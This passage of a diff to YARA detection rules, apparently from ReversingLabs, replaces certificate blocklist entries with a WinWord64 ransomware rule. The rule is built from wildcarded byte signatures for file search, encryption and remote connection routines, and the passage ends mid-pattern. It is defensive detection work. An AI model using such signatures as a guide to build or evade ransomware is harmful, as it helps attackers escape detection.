+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 8B 75 ?? 57
+            8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 89 55 ?? 89 75 ??
+            89 45 ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15
+            ?? ?? ?? ?? 8B 55 ?? 33 C9 0B C8 89 55 ?? 89 4D ?? 83 FB ?? 75 ?? 0B C3 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
+            F0 FF 15 ?? ?? ?? ?? 33 C9 03 F0 83 C6 ?? 0F 92 C1 F7 D9 0B CE 51 E8 ?? ?? ?? ?? 8B
+            F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF 75 ??
+            56 E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 0F 8C ?? ??
+            ?? ?? 8B 45 ?? 0F 8F ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 85 C9 0F 8F ?? ??
+            ?? ?? 7C ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D
+            4D ?? D1 E8 89 45 ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F 57 C0 0F B6 47 ?? C1 E1 ?? 0B C8
+        }
+		$encrypt_files_p2 = {
+            66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B
+            C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6 4F ?? C1 E1 ?? 0B C8 0F B6 47 ??
+            6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6 47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ??
+            0B C8 53 89 4D ?? FF D7 33 F6 8D 45 ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? FF 75 ?? BA ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51 53 FF D7 6A
+            ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 45 ?? 03 F0 3B 75 ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 6A ?? 8D
+            45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ??
+            ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 73 ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B
+            3D ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B 3D
+            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F
+        }
+		$encrypt_files_p3 = {
+            57 C0 0F B6 47 ?? C1 E1 ?? 0B C8 66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ??
+            ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6
+            4F ?? C1 E1 ?? 0B C8 0F B6 47 ?? 6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6
+            47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ?? 0B C8 53 89 4D ?? FF D7 8B 35 ?? ?? ?? ?? 8D 45 ??
+            6A ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6 85 C0 74 ?? FF 75 ?? BA ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51
+            53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            81 7D ?? ?? ?? ?? ?? 72 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6
+            85 C0 75 ?? 8B 75 ?? 6A ?? 0F 57 C0 6A ?? 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF D7
+            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 89 55 ?? C7
+            45 ?? ?? ?? ?? ?? 85 D2 74 ?? 8B FA B9 ?? ?? ?? ?? F3 A5 8B 4D ?? 68 ?? ?? ?? ?? 8B
+            01 8B 49 ?? 89 82 ?? ?? ?? ?? 8D 45 ?? 50 52 6A ?? 6A ?? 6A ?? FF 75 ?? 89 8A ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF 15
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 EB ?? 83 CE ?? 85 DB 74 ?? 53 FF 15 ??
+            ?? ?? ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 E8 ?? ?? ?? ?? 8B
+            4D ?? 83 C4 ?? 8B C6 33 CD 5F 5E 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files_p1 = {
+            FF 74 B4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 46 83
+            FE ?? 7C ?? FF 74 24 ?? FF D7 68 ?? ?? ?? ?? 8B F0 FF D7 03 F0 8D 84 24 ?? ?? ?? ??
+            6A ?? 50 FF D7 8D 0C 06 33 C0 83 C1 ?? 0F 92 C0 F7 D8 0B C1 50 E8 ?? ?? ?? ?? 8B F0
+            83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ??
+            ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? 83 C7 ?? 57 FF 15 ?? ?? ??
+            ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 85 C9 74 ?? 8B 54 24 ?? C7 01 ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? 83 7A ?? ?? 75 ?? 89 4A ?? 89 4A ?? 57 89 31 FF 15 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 42 ?? 89 48 ?? 8B 42 ?? 8B 40 ?? 89 42 ?? 89 30 57 FF 15 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 B4 ?? 8D 84 24
+        }
+		$find_files_p2 = {
+            50 FF D3 85 C0 0F 85 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 6A ?? FF 74 24 ?? FF D7 8B F0 8D
+            84 24 ?? ?? ?? ?? 50 FF D7 03 F0 33 C0 83 C6 ?? 0F 92 C0 F7 D8 0B C6 50 E8 ?? ?? ??
+            ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56
+            E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 56 E8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? E8 ?? ??
+            ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 EB ?? 57 68 ?? ?? ??
+            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 8B 54 24 ?? 53 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ??
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 8B 35 ?? ??
+            ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15
+        }
+		$create_crypt_context = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ??
+            ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 C8 ?? 8B 4D ?? 33 CD E8 ?? ?? ??
+            ?? 8B E5 5D C2 ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 6A ?? 50 FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF
+            D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 75 ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 68 ?? ?? ?? ?? 56 6A ??
+            FF 15 ?? ?? ?? ?? 8D 45 ?? 89 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
+            04 45 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 75 ?? 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B 45 ?? 5E 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ??
+            33 C0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLON LTD" and ( pe.signatures [ i ] . serial == "00:b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" or pe.signatures [ i ] . serial == "b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" ) and 1554249600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $create_crypt_context ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4F407Eb50803845Cc43937823E1344C0 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Winword64 : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WinWord64 ransomware."
 		author = "ReversingLabs"
-		id = "6989cda1-f28e-58b7-8572-a7dc2e84d9e3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a5f7967d-58f4-5fdd-b67f-5f5dbfec0f4b"
+		date = "2021-02-11"
+		modified = "2021-02-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3234-L3250"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4d5a2b0619be902d8a437f204ae1b87222c73d3186930809b1f694bad429aea8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.WinWord64.yara#L1-L215"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "73d8c4f1b3bed365320b26332f1f1b49404d8e6536f3e25042f5f64e5bc09bd4"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WinWord64"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW COOKED VENTURES LTD" and pe.signatures [ i ] . serial == "4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" and 1556555362 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6922Bb5De88E4127E1Ac6969E6A199F5 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "86e16068-8b0b-5f0f-af5e-5ee9f518a915"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3252-L3268"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "39dbaa232ea9125934b3682d780e3821d12e771f2b844d027d99a432fe249d9f"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 33 DB 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ??
+            03 C1 89 9D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51
+            50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 53 89 5D ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ??
+            ?? ?? ?? 53 0F 43 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ??
+            85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 0D
+            ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 51 50 51
+            8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 53
+            FF 15 ?? ?? ?? ?? 8B 55 ?? 8B D8 89 9D ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55
+            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
+            76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 66 89 45 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B9 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9
+        }
+		$remote_connection_p2 = {
+            0F 43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D BD ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F 43 BD ?? ?? ?? ?? 83
+            3D ?? ?? ?? ?? ?? 0F 43 0D ?? ?? ?? ?? 03 C1 83 3D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F
+            43 0D ?? ?? ?? ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 57 53 FF 15 ?? ?? ??
+            ?? 8B 55 ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ??
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 95 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ??
+            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ??
+            FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D ?? 03 C1 83 7D ?? ?? 8D 4D
+            ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 8D 4D ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ??
+            ?? ?? 83 3D ?? ?? ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B
+        }
+		$remote_connection_p3 = {
+            55 ?? 2B C2 57 51 3B F8 77 ?? 8D 04 3A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34
+            10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04 37 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5
+            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 75 ?? 8B C6
+            8B BD ?? ?? ?? ?? 0F 43 CF 8B 55 ?? 2B C2 8B 9D ?? ?? ?? ?? 53 51 3B D8 77 ?? 8D 04
+            1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ?? ?? 83 C4 ?? C6 04
+            1E ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B BD
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 83 3D ?? ??
+            ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 55 ?? 2B C2 53 51
+            3B D8 77 ?? 8D 04 1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ??
+            ?? 83 C4 ?? C6 04 33 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 45 ?? 0F 43
+            D3 8B 75 ?? 2B C6 8B 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ??
+            8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 06 ??
+            EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 9D ?? ??
+            ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B
+        }
+		$remote_connection_p4 = {
+            45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45
+            ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30
+            ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B D0 83 78 ?? ?? 72 ?? 8B 10
+            8B 48 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D
+            04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4
+            ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ??
+            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52
+            51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 83 3D
+            ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D
+            ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03
+            F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ??
+            ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43
+            55 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04
+            0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ??
+            C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ??
+            8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 31 89 45 ?? 8D
+        }
+		$remote_connection_p5 = {
+            45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB
+            ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? 85 F6 74 ?? 8B 45 ?? 8D 4D ?? 83 7D ?? ?? 6A ?? 0F 43 4D ?? 50 50 51 6A ?? FF B5
+            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ??
+            ?? ?? ?? 51 68 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 F6 8B 35 ??
+            ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B
+            85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C6 45 ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ??
+            2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ??
+            ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7
+        }
+		$remote_connection_p6 = {
+            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ??
+            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
